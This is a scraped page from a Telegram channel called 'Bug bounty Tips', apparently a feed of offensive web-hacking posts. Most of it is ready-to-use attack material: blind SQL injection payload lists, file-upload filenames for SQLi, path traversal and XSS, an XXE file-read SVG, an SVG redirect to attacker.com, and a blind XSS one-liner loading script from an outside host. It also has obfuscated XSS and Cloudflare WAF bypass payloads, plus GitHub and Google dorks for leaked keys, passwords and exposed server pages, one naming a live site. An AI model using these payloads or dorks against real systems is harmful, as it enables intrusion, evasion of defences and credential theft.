en
Feedback
Bug bounty Tips

Bug bounty Tips

Open in Telegram

πŸ›‘οΈ Cybersecurity enthusiast | πŸ’» Helping secure the digital world | 🌐 Web App Tester | πŸ•΅οΈβ€β™‚οΈ OSINT Specialist Admin: @laazy_hack3r

Show more
5 849
Subscribers
+1124 hours
+687 days
+37430 days
Posts Archive
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨 πŸ“’Subdominator is a powerful tool for passive subdomain enumera
🚨Subdominator - Unleash the Power of Subdomain Enumeration🚨 πŸ“’Subdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources. πŸ”—Link- https://github.com/RevoltSecurities/Subdominator

Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc gr
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips

Repost from Bug Bounty
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc gr
Tip : Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
#BugBounty #bugbountytips

this is the top xor blind payloads i collected that most guys used including my personal also that will sure help you :) 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X 0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z 'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z X'XOR(if(now()=sysdate(),//sleep(5)//,0))XOR'X X'XOR(if(now()=sysdate(),(sleep((((5))))),0))XOR'X X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X 'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z (SELECT(0)FROM(SELECT(SLEEP(6)))a) 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' 'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR' (SELECT * FROM (SELECT(SLEEP(5)))a) '%2b(select*from(select(sleep(5)))a)%2b' CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END ');(SELECT 4564 FROM PG_SLEEP(5))-- ["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"] DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar 1' AND (SELECT 6268 FROM (SELECT(SLEEP(5)))ghXo) AND 'IKlK'='IKlK (select*from(select(sleep(20)))a) '%2b(select*from(select(sleep(0)))a)%2b' *'XOR(if(2=2,sleep(10),0))OR' -1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--// '+(select*from(select(if(1=1,sleep(20),false)))a)+'" 2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE) BENCHMARK(10000000,MD5(CHAR(116))) '%2bbenchmark(10000000%2csha1(1))%2b' '%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(5),1)))a)--%20 - true polyglots payloads: if(now()=sysdate(),sleep(3),0)/'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"/ if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/

πŸ–₯Chaining Vulnerabilities through File UploadπŸ–₯ SLQi⏳
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal⏳
../../etc/passwd/logo.png
../../../logo.png
XSS⏳
->  Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"

->  Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>
Open redirect ⏳
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE ⏳
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>

πŸ”₯πŸ”₯Github-DorkπŸš€πŸš€πŸ”₯πŸ”₯ Happy Hunting πŸ” api_key πŸ” app_AWS_SECRET_ACCESS_KEY πŸ” app_secret πŸ” authoriztion πŸ” Ldap πŸ” aws_access_key_id πŸ” secret πŸ” bash_history πŸ” bashrc%20password πŸ” beanstalkd πŸ” client secre πŸ” composer πŸ” config πŸ” credentials πŸ” DB_PASSWORD πŸ” dotfiles πŸ” .env file πŸ” .exs file πŸ” extension:json mongolab.com πŸ” extension:pem%20private πŸ” extension:ppk private πŸ” extension:sql mysql dump πŸ” extension:yaml mongolab.com πŸ” .mlab.com password πŸ” mysql πŸ” npmrc%20_auth πŸ” passwd πŸ” passkey πŸ” rds.amazonaws.com password πŸ” s3cfg πŸ” send_key πŸ” token πŸ” filename:.bash_history πŸ” filename:.bash_profile aws πŸ” filename:.bashrc mailchimp πŸ” filename:CCCam.cfg πŸ” filename:config irc_pass πŸ” filename:config.php dbpasswd πŸ” filename:config.json auths πŸ” filename:config.php pass πŸ” filename:config.php dbpasswd πŸ” filename:connections.xml πŸ” filename:.cshrc πŸ” filename:.git-credentials πŸ” filename:.ftpconfig πŸ” filename:.history πŸ” filename:gitlab-recovery-codes.txt πŸ” filename:.htpasswd πŸ” filename:id_rsa πŸ” filename:.netrc password πŸ” FTP πŸ” filename:wp-config.php πŸ” git-credentials πŸ” github_token πŸ” HEROKU_API_KEY language:json πŸ” HEROKU_API_KEY language:shell πŸ” GITHUB_API_TOKEN language:shell πŸ” oauth πŸ” OTP πŸ” databases password πŸ” [WFClient] Password= extension:ica πŸ” xoxa_Jenkins πŸ” security_credentials #bugbountytips #GitHub

https://t.me/bug_hunting_talks This is my discussion group you guys can joint

Case Insensitivity Vulnerability
/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok

Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team member
Look into subdomains that allow sign-in with Google, as they may contain sensitive information accessible only to team members. Dork: site:*.example.com inurl:login | inurl:signin Google

Dork: Apache Server Leakage inurl:server-status "apache server status" "cpu usage" Reference: https://medium.com/@ghostlulzha
Dork: Apache Server Leakage
inurl:server-status "apache server status" "cpu usage"
Reference: https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a Vulnerable Site- https://www.itronot.co.il/server-status

Google Dork - High % keywords πŸš€ inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com

Google Dork - Server Errors ⚑ inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com

Google Dork - Sensitive Docs πŸ“„ ext:txt | ext:pdf | ext:xml | ext:xls | ext:xlsx | ext:ppt | ext:pptx | ext:doc | ext:docx intext:β€œconfidential” | intext:β€œNot for Public Release” | intext:”internal use only” | intext:β€œdo not distribute”

πŸ“’a XSS payload, Cuneiform-alphabet based ! This payload was on trend back in 2020, but it still works :) π’€€='',π’‰Ί=!π’€€+π’€€,𒀃=
πŸ“’a XSS payload, Cuneiform-alphabet based ! This payload was on trend back in 2020, but it still works :) π’€€='',π’‰Ί=!π’€€+π’€€,𒀃=!π’‰Ί+π’€€,π’‡Ί=π’€€+{},π’Œ=π’‰Ί[π’€€++], π’€Ÿ=π’‰Ί[π’ˆ«=π’€€],𒀆=++π’ˆ«+π’€€,𒁹=π’‡Ί[π’ˆ«+𒀆],π’‰Ί[𒁹+=π’‡Ί[π’€€] +(π’‰Ί.𒀃+π’‡Ί)[π’€€]+𒀃[𒀆]+π’Œ+π’€Ÿ+π’‰Ί[π’ˆ«]+𒁹+π’Œ+π’‡Ί[π’€€] +π’€Ÿ]𒁹")() (Cuneiform is a logo-syllabic script that was used to write several languages of the Ancient Near East. The script was in active use from the early Bronze Age until the beginning of the Common Era. It is named for the characteristic wedge-shaped impressions (Latin: cuneus) which form its signs.) Source - Wikipedia

New Xss Fly Under Radar Cloudflare Bypass 🧱 Payload : "&gt; Credit -Halim
New Xss Fly Under Radar Cloudflare Bypass 🧱 Payload : "> Credit -Halim

New XSS Bypass Cloudflare WAF 🧱 Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

🫑Automate Your XSS
#!/bin/bash read TARGET subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt cat waybackurls.txt | dalfox pipe

Blind XSS In X-Forwarded-For Header
subfinder -d http://target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"

XSS Oneliner
echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe
subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,πƒŒ=𐂃+{},𐁉=𐃨[𐂃++],𐃡=𐃨[𐂓=𐂃],π€œ=++𐂓+𐂃,𐂠=πƒŒ[𐂓+π€œ],𐃨[𐂠+=πƒŒ[𐂃]+(𐃨.𐂝+πƒŒ)[𐂃]+𐂝[π€œ]+𐁉+𐃡+𐃨[𐂓]+𐂠+𐁉+πƒŒ[𐂃]+𐃡][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[π€œ]+𐃡+𐁉+'(𐂃)')()"

Bug bounty Tips - Statistics & analytics of Telegram channel @bugbounty_tech